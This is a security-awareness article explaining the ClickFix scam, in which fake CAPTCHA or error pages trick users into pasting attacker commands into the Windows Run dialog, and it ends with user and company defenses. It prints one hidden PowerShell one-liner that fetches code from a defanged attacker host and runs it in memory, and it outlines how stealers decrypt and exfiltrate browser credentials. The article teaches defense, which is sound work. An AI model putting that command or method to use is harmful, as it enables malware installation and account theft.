ClickFix: The "Paste This to Fix It" Scam That Installs Malware

You have almost certainly seen it already. A page that says "verify you are human", or "your browser ran into an error, follow these steps to fix it". The instructions look harmless: press Win+R, paste, press Enter. Just another procedure. It is called ClickFix, and right now it is one of the most widespread attack techniques in the world. Its genius - and the reason it is so dangerous - is that it does not exploit a vulnerability in your computer. It exploits you.

How the chain works

The scenario is almost always the same. You land on a page - a fake CAPTCHA, a fake Chrome error, a fake document "to unlock" - that gives you step-by-step instructions to follow in order to continue. While you read them, a piece of JavaScript on the page has already silently copied a command into your clipboard. You open the Windows Run dialog with Win+R, paste with Ctrl+V - and what lands there is the attacker's command, not what you think - and you press Enter. That command, usually an obfuscated mshta or powershell, downloads and runs malware. You did not open an attachment, you did not click a suspicious link. You simply followed a procedure.

What that command actually does

It is worth opening up, because every piece has a precise job. What gets pasted, in simplified form, looks like this:

powershell -W Hidden -nop -ep bypass -c "IEX(IWR -useb hxxps://cdn-verify[.]top/x)"

Translated piece by piece:

• powershell - the Windows scripting engine. It is installed everywhere and signed by Microsoft: to the system it is a trusted program, not a virus.
• -W Hidden - launches the window hidden. You see nothing open: no flash, no console.
• -nop - skips the PowerShell profile, to start faster and with no configuration in the way.
• -ep bypass - ignores the policy that is supposed to block untrusted scripts from running.
• IWR (Invoke-WebRequest) - downloads a file from a web address: here, the real malware.
• IEX (Invoke-Expression) - runs the just-downloaded text as code, directly in memory, without ever saving it to disk.

That last point is the heart of it: the attack is fileless. No file is written to the hard disk, so traditional antivirus - which works by scanning files - has nothing to scan. The malware lives in RAM, run by a legitimate Windows process the victim launched themselves.

Step by step, behind the scenes

Here is what actually happens from click to exfiltration, even though you see almost nothing on screen:

1. Clipboard hijack. The moment you click "Verify" or "Fix", a piece of JavaScript on the page silently copies the command into your clipboard. What you are about to paste is not what you think: it is already the attacker's command.
2. Execution. Win+R opens the Run dialog, you paste, you press Enter. Windows launches PowerShell with those parameters. To an EDR it looks like "PowerShell starting" - a perfectly normal event - not malware.
3. Download into memory. IWR contacts the attacker's server and downloads the real payload - the stealer - straight into RAM.
4. Fileless execution. IEX runs it on the fly. No file on disk, nothing for classic antivirus to trip on.
5. Harvesting. The stealer opens the browser's databases (saved passwords in Login Data, cookies in Cookies: these are SQLite files), decrypts them using Windows DPAPI - which runs with your own permissions - and also grabs crypto wallets, tokens and interesting files.
6. Exfiltration. It packages everything and sends it to the command-and-control (C2) server over HTTPS, blending into normal encrypted web traffic.
7. Vanishing. Many stealers are "smash and grab": they steal and leave within minutes, installing nothing permanent, so forensic analysis finds very few traces.

Why it works

Two reasons, one psychological and one technical. The psychological one is that it hijacks the routine of "follow the steps to fix the problem" - the very same thing you do ten times a day when IT tells you how to sort something out. The brain does not raise its guard, because it is a familiar procedure, not a suspicious attachment. The technical one is even nastier: the technique sidesteps most defenses precisely because you are the one launching the command. There is no vulnerability to exploit, no malicious file an antivirus can catch before it opens. Execution starts from a legitimate user action on a legitimate Windows tool. It is a cheap attack, infinitely scalable - just a web page - and it works.

What it actually installs

Almost always, an infostealer. It steals the passwords saved in your browser, crypto wallets, and - the part most people underestimate - your session cookies. And this is where "but I have two-factor authentication" falls apart. A stolen session cookie means the attacker is already inside your accounts: logged in as you, with no need for your password, fully bypassing MFA, because your session had already been authenticated. MFA protects the moment of login, not an already-active session stolen from under your nose.

Why it is exploding

ClickFix is not new: the technique was documented by Proofpoint researchers in 2024 - who gave it its name - and exploded through 2025. To give a sense of scale, according to figures published by Microsoft, in the first half of 2025 alone attacks of this kind grew by more than 500%, coming to drive nearly half of the intrusions the company tracks. In my work across phishing simulation and threat intelligence I see these campaigns from both sides, and the trajectory is clear. ClickFix has become one of the most-used initial-access vectors because it satisfies everything an attacker wants: it costs almost nothing (it is a page), it requires no exploit development, it slips past email filters because the victim often arrives via a malicious ad or a compromised site rather than an attachment, and it targets the one attack surface that never gets patched - people. As long as convincing a human stays easier than breaking into a patched system, techniques like this will dominate.

How to spot it

There is one rule, and it is enough: no legitimate site will ever ask you to open the Run dialog (Win+R), a terminal, or PowerShell and paste something into it. A real CAPTCHA does not need your keyboard shortcuts. A real browser error is not fixed by copying commands. If a page - however convincing, however urgent - tells you to "press these keys and paste", that is the end of the conversation: close it and walk away. It is not a procedure, it is an attack asking you to run it yourself.

How to defend, on the company side

For an SME the defense has two legs. The first is human: people need to be exposed to this specific pattern before they meet it for real, ideally through simulations that include the ClickFix pattern, not a generic phishing slide. Someone who has already seen the trap in a test recognizes it in the wild. The second is technical: attack-surface-reduction rules that stop mshta and script interpreters from launching out of anomalous contexts, application control, an EDR that reasons about behavior and not just signatures, and restrictions on who can actually launch PowerShell on a company machine. You need both legs: technical controls catch what human attention misses, and vice versa.

The lesson

The most reliable exploit of 2026 is not a six-figure zero-day: it is a convincing instruction given to the right person at the right moment. And the defense, against this class of attacks, is never only technology. It is teaching people the one rule that shields them from half of modern threats: never paste a command someone else gave you.